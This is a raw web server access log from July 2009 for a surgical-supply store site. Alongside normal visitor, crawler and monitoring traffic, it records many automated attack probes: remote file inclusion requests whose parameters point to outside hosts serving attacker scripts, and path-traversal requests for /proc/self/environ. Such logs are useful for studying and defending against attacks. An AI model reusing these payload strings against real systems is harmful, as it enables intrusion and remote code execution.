66.172.22.2 - - [01/Jul/2009:08:07:36 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.98.209.71 - - [01/Jul/2009:08:07:39 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:07:39 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:07:39 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:07:42 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.221.88.162 - - [01/Jul/2009:08:07:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:07:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:07:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:07:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
60.43.229.5 - - [01/Jul/2009:08:07:46 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 246 "-" "Mozilla/5.0"
198.64.149.93 - - [01/Jul/2009:08:07:53 -0400] "GET //common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:07:53 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:07:56 -0400] "GET /logs//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:07:56 -0400] "GET /logs//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:07:56 -0400] "GET //common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:07:56 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
220.231.126.252 - - [01/Jul/2009:08:07:59 -0400] "GET /main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:08:07:59 -0400] "GET /logs/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:08:07:59 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
198.64.149.93 - - [01/Jul/2009:08:08:49 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:08:49 -0400] "GET //common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:08:52 -0400] "GET /logs//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:09:00 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:09:02 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
198.64.149.93 - - [01/Jul/2009:08:09:31 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
172.16.1.98 - - [01/Jul/2009:08:09:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [01/Jul/2009:08:09:42 -0400] "PROPFIND /excel HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [01/Jul/2009:08:09:42 -0400] "PROPFIND /excel HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
71.180.219.239 - - [01/Jul/2009:08:09:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129EF4E6BD372004150083+M37+ENG HTTP/1.1" 200 35323 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EF4E66A3F2000CC0083+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
172.16.1.66 - - [01/Jul/2009:08:10:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [01/Jul/2009:08:10:25 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [01/Jul/2009:08:10:25 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:08:10:26 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:08:10:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:08:10:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.54.48 - - [01/Jul/2009:08:10:27 -0400] "GET ///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.233.11.27 - - [01/Jul/2009:08:10:51 -0400] "GET //include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
220.231.126.252 - - [01/Jul/2009:08:11:43 -0400] "GET /logs/access_log.Q109051700%20%20/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:08:11:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.81 - - [01/Jul/2009:08:12:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [01/Jul/2009:08:12:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [01/Jul/2009:08:12:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.161.243 - - [01/Jul/2009:08:13:06 -0400] "GET /logs/error_log.Q107081900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.188.112.35 - - [01/Jul/2009:08:13:28 -0400] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.188.112.35 - - [01/Jul/2009:08:13:28 -0400] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
93.188.112.35 - - [01/Jul/2009:08:13:30 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.221.88.162 - - [01/Jul/2009:08:13:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 46021 "http://www.acesurgical.com/images/monthly_specials6.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
64.221.88.162 - - [01/Jul/2009:08:13:32 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 46021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
64.221.88.162 - - [01/Jul/2009:08:13:35 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
64.221.88.162 - - [01/Jul/2009:08:13:35 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
64.221.88.162 - - [01/Jul/2009:08:13:35 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
64.221.88.162 - - [01/Jul/2009:08:13:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:13:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:13:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:08:13:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
220.231.126.252 - - [01/Jul/2009:08:14:18 -0400] "GET /logs/access_log.Q109060900%20%20/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.221.88.162 - - [01/Jul/2009:08:15:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
64.221.88.162 - - [01/Jul/2009:08:15:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
64.221.88.162 - - [01/Jul/2009:08:15:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
64.221.88.162 - - [01/Jul/2009:08:15:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
83.98.209.71 - - [01/Jul/2009:08:15:35 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:15:35 -0400] "GET /logs/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:15:35 -0400] "GET /errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:08:15:37 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.81 - - [01/Jul/2009:08:15:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [01/Jul/2009:08:15:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [01/Jul/2009:08:15:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.161.243 - - [01/Jul/2009:08:16:03 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.243 - - [01/Jul/2009:08:16:03 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 2869991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.221.88.167 - - [01/Jul/2009:08:16:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:16:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:16:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:16:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [01/Jul/2009:08:16:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.40.150.211 - - [01/Jul/2009:08:17:09 -0400] "GET /?sourcedir=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.233.11.27 - - [01/Jul/2009:08:17:10 -0400] "GET //rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.233.11.27 - - [01/Jul/2009:08:17:26 -0400] "GET //include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
121.165.73.157 - - [01/Jul/2009:08:17:36 -0400] "GET /logs/access_log.Q109052800/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:08:17:36 -0400] "GET /?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:08:17:36 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 7716 "-" "libwww-perl/5.805"
211.233.11.27 - - [01/Jul/2009:08:17:46 -0400] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
123.143.98.5 - - [01/Jul/2009:08:18:13 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:08:18:29 -0400] "GET /logs/access_log.Q109060200/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
72.30.161.243 - - [01/Jul/2009:08:19:09 -0400] "GET /logs/access_log.Q108081100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.16 - - [01/Jul/2009:08:19:15 -0400] "GET /images/items/0014585_full.jpg HTTP/1.1" 200 2849 "-" "Googlebot-Image/1.0"
217.65.194.10 - - [01/Jul/2009:08:19:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.65.194.10 - - [01/Jul/2009:08:19:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.65.194.10 - - [01/Jul/2009:08:19:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.65.194.10 - - [01/Jul/2009:08:19:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.16.1.170 - - [01/Jul/2009:08:20:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [01/Jul/2009:08:20:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [01/Jul/2009:08:20:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.81.106.172 - - [01/Jul/2009:08:20:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.81.106.172 - - [01/Jul/2009:08:20:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.81.106.172 - - [01/Jul/2009:08:20:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.81.106.172 - - [01/Jul/2009:08:20:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
64.221.88.167 - - [01/Jul/2009:08:21:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:21:06 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:21:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.221.88.167 - - [01/Jul/2009:08:21:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.71.204 - - [01/Jul/2009:08:21:29 -0400] "GET /logs/access_log.Q107103100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.204 - - [01/Jul/2009:08:21:30 -0400] "GET /logs/error_log.Q108052700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [01/Jul/2009:08:21:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.109.22.117 - - [01/Jul/2009:08:21:54 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:08:21:54 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:08:21:55 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:08:22:12 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.816"
220.231.126.252 - - [01/Jul/2009:08:22:22 -0400] "GET /logs/access_log.Q109060900/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
172.16.1.68 - - [01/Jul/2009:08:22:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [01/Jul/2009:08:22:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [01/Jul/2009:08:22:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.98.222.18 - - [01/Jul/2009:08:22:30 -0400] "GET /logs/access_log.Q109061600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:08:22:30 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:08:22:30 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.69 - - [01/Jul/2009:08:23:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [01/Jul/2009:08:23:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [01/Jul/2009:08:23:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.134.74 - - [01/Jul/2009:08:23:25 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:23:29 -0400] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:23:29 -0400] "GET /logs/access_log.Q109061400%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.157.45.177 - - [01/Jul/2009:08:24:12 -0400] "GET /logs/access_log.Q109060600%20%20/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.157.45.177 - - [01/Jul/2009:08:24:12 -0400] "GET /index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.157.45.177 - - [01/Jul/2009:08:24:12 -0400] "GET /logs/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.157.45.177 - - [01/Jul/2009:08:24:12 -0400] "GET /logs/access_log.Q109061800%20%20/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:24:12 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:24:13 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:24:13 -0400] "GET /logs/access_log.Q109061100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:08:24:16 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
172.16.1.69 - - [01/Jul/2009:08:24:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [01/Jul/2009:08:24:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [01/Jul/2009:08:24:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
